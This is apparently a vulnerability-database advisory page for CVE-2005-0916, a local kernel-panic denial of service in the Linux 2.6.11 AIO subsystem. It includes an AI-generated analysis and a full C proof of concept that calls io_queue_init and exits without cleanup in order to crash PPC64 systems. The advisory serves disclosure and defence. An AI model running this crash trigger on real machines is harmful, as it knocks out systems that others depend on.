CVE-2005-0916
Description
AIO in the Linux kernel 2.6.11 on the PPC64 or IA64 architectures with CONFIG_HUGETLB_PAGE enabled allows local users to cause a denial of service (system panic) via a process that executes the io_queue_init function but exits without running io_queue_release, which causes exit_aio and is_hugepage_only_range to fail.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
2Patches
Vulnerability mechanics
Root cause
"A race condition exists where a process can exit after initializing AIO but before releasing the AIO context, leading to a system panic."
Attack vector
A local user can trigger a denial of service by exploiting a flaw in the AIO subsystem of the Linux kernel. The vulnerability is triggered when a process initiates an asynchronous I/O operation using `io_queue_init` but terminates prematurely without calling `io_queue_release`. This specific sequence causes subsequent calls to `exit_aio` and `is_hugepage_only_range` to fail, resulting in a system panic [ref_id=1].
Affected code
The vulnerability lies within the AIO (Asynchronous I/O) subsystem of the Linux kernel, specifically in the handling of the `io_queue_init` function and its subsequent cleanup. The issue arises when a process calls `io_queue_init` but exits without properly calling `io_queue_release`, leading to failures in `exit_aio` and `is_hugepage_only_range` [ref_id=1].
What the fix does
The provided bundle does not contain a patch or specific details on how the vulnerability is fixed. The advisory indicates that the issue is related to the AIO subsystem and the handling of `io_queue_release` after `io_queue_init` [ref_id=1]. Remediation would likely involve ensuring proper cleanup of AIO contexts even in error or early exit scenarios.
Preconditions
- configThe system must be running Linux kernel 2.6.11 on PPC64 or IA64 architectures.
- configThe CONFIG_HUGETLB_PAGE kernel configuration option must be enabled.
- authThe attacker must have local user access to the system.
Reproduction
```c #define _XOPEN_SOURCE 600 #define _GNU_SOURCE
#include <unistd.h> #include <stdlib.h> #include <stdio.h> #include <string.h> #include <errno.h> #include <sys/fcntl.h> #include <sys/mman.h> #include <sys/wait.h> #include <sys/stat.h> #include <libaio.h>
int pagesize; char *iobuf; io_context_t myctx; int aio_maxio = 4;
/* * do a AIO DIO write */ int do_aio_direct_read(int fd, char *iobuf, int offset, int size) { struct iocb myiocb; struct iocb *iocbp = &myiocb; int ret; struct io_event e; struct stat s;
io_prep_pread(&myiocb, fd, iobuf, size, offset); if ((ret = io_submit(myctx, 1, &iocbp)) != 1) { perror("io_submit"); return ret; }
ret = io_getevents(myctx, 1, 1, &e, 0);
if (ret) { struct iocb *iocb = e.obj; int iosize = iocb->u.c.nbytes; char *buf = iocb->u.c.buf; long long loffset = iocb->u.c.offset;
printf("AIO read of %d at offset %lld returned %d\n", iosize, loffset, e.res); }
return ret;
}
int main(int argc, char *argv[]) { char *filename; int fd; int err;
filename = "test.aio.file"; fd = open(filename, O_RDWR|O_DIRECT|O_CREAT|O_TRUNC, 0666);
pagesize = getpagesize(); err = posix_memalign((void**) &iobuf, pagesize, pagesize); if (err) { fprintf(stderr, "Error allocating %d aligned bytes.\n", pagesize); exit(1); } err = write(fd, iobuf, pagesize); if (err != pagesize) { fprintf(stderr, "Error ret = %d writing %d bytes.\n", err, pagesize); perror(""); exit(1); } memset(&myctx, 0, sizeof(myctx)); io_queue_init(aio_maxio, &myctx); err = do_aio_direct_read(fd, iobuf, 0, pagesize); close(fd);
printf("This will panic on ppc64\n"); return err;
} // milw0rm.com [2005-04-04] ```
Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
4News mentions
0No linked articles in our index yet.